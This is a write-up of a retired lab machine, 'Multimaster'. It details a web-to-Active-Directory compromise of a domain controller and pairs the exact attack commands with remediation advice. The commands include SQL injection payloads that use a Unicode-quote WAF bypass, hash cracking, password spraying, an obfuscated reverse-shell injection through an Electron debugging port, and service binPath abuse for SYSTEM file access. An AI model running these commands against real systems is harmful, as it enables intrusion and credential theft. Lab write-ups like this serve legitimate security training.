Multimaster
Summary
The MEGACORP.LOCAL domain controller ($TARGET) was fully compromised through a web-to-Active-Directory attack chain. An employee-lookup API on IIS accepted JSON search queries behind a WAF that blocked raw single quotes; substituting the Unicode look-alike character U+2019 (RIGHT SINGLE QUOTATION MARK) bypassed the filter and enabled a five-column MSSQL UNION injection that extracted [REDACTED: recovered credential] password hashes from the application login table.
Offline cracking with hashcat recovered several cleartext passwords, which were sprayed across SMB and WinRM against a domain user list also derived from the injection; MEGACORP.LOCAL\tushikikatomo with password [REDACTED: recovered credential] authenticated to WinRM and yielded user.txt. Process enumeration from that foothold shell discovered a VS Code Electron process owned by developer cyork, launched with a Chrome DevTools remote-debugging port bound to localhost; injecting a PowerShell reverse shell through that unauthenticated debugger pivoted into cyork's context.
Reverse-engineering the .NET API DLL exposed a hardcoded SQL Server connection-string password belonging to MEGACORP.LOCAL\jorden, a member of the built-in Server Operators group. That group's service-reconfiguration rights were abused to replace the Browser service binary path with a robocopy command that staged root.txt to a world-readable path as SYSTEM, completing full domain-controller compromise.
Command conventions
The commands below refer to the target by variable rather than by address. Bind them in your shell before running anything; recovered credentials are withheld and shown as [REDACTED: recovered credential].
export TARGET="<retired-instance-ip>"
export PASSWORD="<a-password-you-choose>"
export PASSWORD2="<a-password-you-choose>"
export PASSWORD5="<a-password-you-choose>"
export PASSWORD6="<a-password-you-choose>"
export PASSWORD7="<a-password-you-choose>"Attack path — how the box was taken
Exact commands 2
nmap -sV -sC -T4 -p 53,80,88,135,139,389,445,464,593,636,1433,3268,3389,5985,9389 $TARGET -oN multimaster_nmap.txtecho "$TARGET MULTIMASTER.MEGACORP.LOCAL MEGACORP.LOCAL" | sudo tee -a /etc/hostsExact commands 3
curl -sS -X POST http://$TARGET/api/getColleagues -H 'Content-Type: application/json' -d '{"name":"\u2019 ORDER BY 5--"}'curl -sS -X POST http://$TARGET/api/getColleagues -H 'Content-Type: application/json' -d '{"name":"\u2019 UNION SELECT 1,username,password,4,5 FROM dbo.Logins--"}'curl -sS -X POST http://$TARGET/api/getColleagues -H 'Content-Type: application/json' -d '{"name":"\u2019 UNION SELECT 1,SUSER_SNAME(SID_BINARY(N\u20191\u2019)),3,4,5--"}'FixEliminate SQL injection in the employee-search APICritical
Exact commands 2
hashcat -m 17900 -a 0 /tmp/multimaster_keccak384.hashes /usr/share/wordlists/rockyou.txt --quiet --potfile-path /tmp/multimaster_keccak384.pothashcat -m 17900 /tmp/multimaster_keccak384.hashes --show --potfile-path /tmp/multimaster_keccak384.potFixReplace Keccak-384 with a memory-hard password hashing algorithmCritical
Exact commands 2
for proto in smb winrm ldap mssql; do nxc "$proto" $TARGET -d MEGACORP.LOCAL -u svc-nas tushikikatomo andrew lana alice sbauer shayna james cyork jorden aldom ckane kpage zac ilee zpowers okent rmartin alyx nbourne -p $PASSWORD5 $PASSWORD6 $PASSWORD7 --continue-on-success 2>&1 | grep -E '\[\+\]|Pwn3d'; donenxc winrm $TARGET -d MEGACORP.LOCAL -u tushikikatomo -p $PASSWORD6 -X 'Get-ChildItem C:\Users\*\Desktop\user.txt -Force -ErrorAction SilentlyContinue | ForEach-Object { $_.FullName; Get-Content $_.FullName }'FixEnforce a strong domain password policy and account lockout to defeat credential sprayingHigh
Exact commands 4
python3 -c "from Cryptodome.Hash import MD4; h=MD4.new(); h.update('$PASSWORD6'.encode('utf-16le')); print(h.hexdigest())"nxc winrm $TARGET -d MEGACORP.LOCAL -u tushikikatomo -H $PASSWORD -X 'Get-Process | Where-Object {$_.ProcessName -match "code|electron|cef"} | Select-Object Id,ProcessName'nxc winrm $TARGET -d MEGACORP.LOCAL -u tushikikatomo -H $PASSWORD -x 'wmic process where "processid=6772" get CommandLine,Name,ProcessId /format:list'curl -sS --max-time 5 http://127.0.0.1:18112/json/listFixRemove VS Code and Electron remote-debugging flags from all domain-joined hostsHigh
Exact commands 5
iconv -f UTF-8 -t UTF-16LE /tmp/cyork_rev.ps1 | base64 -w0curl -sS http://127.0.0.1:18112/json/list | python3 -c "import sys,json; print(json.load(sys.stdin)[0]['webSocketDebuggerUrl'])"python3 -c "import websocket,json; ws=websocket.create_connection('ws://127.0.0.1:18112/devtools/page/<PAGE_ID>'); ws.send(json.dumps({'id':1,'method':'Runtime.evaluate','params':{'expression':'require(String.fromCharCode(99,104,105,108,100,95,112,114,111,99,101,115,115)).exec(\"powershell -enc <B64_PAYLOAD>\")'}})); print(ws.recv())"ilspycmd MultimasterAPI.dll 2>/dev/null | grep -i 'password\|connectionstring\|Data Source\|Initial Catalog'nxc winrm $TARGET -d MEGACORP.LOCAL -u jorden -p $PASSWORD2 -X 'whoami /groups; whoami /priv; sc.exe qc browser'FixRemove hardcoded credentials from compiled code and store secrets in a vaultCritical
Exact commands 4
nxc winrm $TARGET -d MEGACORP.LOCAL -u jorden -p $PASSWORD2 -X 'sc.exe qc browser'nxc winrm $TARGET -d MEGACORP.LOCAL -u jorden -p $PASSWORD2 -X 'sc.exe stop browser; sc.exe config browser binPath= "cmd /c mkdir C:\Windows\Temp\mm-backup & robocopy C:\Users\Administrator\Desktop C:\Windows\Temp\mm-backup root.txt /B"; sc.exe start browser'nxc winrm $TARGET -d MEGACORP.LOCAL -u jorden -p $PASSWORD2 -X 'Get-Content C:\Windows\Temp\mm-backup\root.txt'nxc winrm $TARGET -d MEGACORP.LOCAL -u jorden -p $PASSWORD2 -X 'sc.exe config browser binPath= "\"%SystemRoot%\\System32\\svchost.exe -k LocalSystemNetworkRestricted -p\""; Remove-Item -Recurse -Force C:\Windows\Temp\mm-backup -ErrorAction SilentlyContinue'FixAudit Server Operators membership and restrict service-reconfiguration rights on domain controllersCritical
Attack patterns used
The transferable techniques behind this compromise.
Password / Credential ReuseCredential Access · Lateral MovementT1078
What it is
A password recovered from one place — a config file, a database, a cracked hash, a service account — is tried against other accounts and services (SSH, SMB, WinRM, sudo, the database, the next host). Reuse turns a single leaked secret into broad access.
Why it works
Humans and deployments reuse passwords across accounts and tiers, and lateral movement thrives on it. Remediate with unique credentials per account/service, a password manager/vault, and MFA on remote-access services.
Read more
SQL InjectionWebT1190
What it is
User input is concatenated into a SQL query, letting an unauthorised user alter the query's logic — bypassing authentication, dumping tables (including password hashes), or, with stacked queries / file privileges, writing webshells or executing OS commands. sqlmap automates detection and exploitation across boolean/error/time/union vectors.
Why it works
The root cause is mixing untrusted data with query code instead of using parameterized statements. Remediate with prepared statements/ORM bindings, least-privilege DB accounts, and input validation.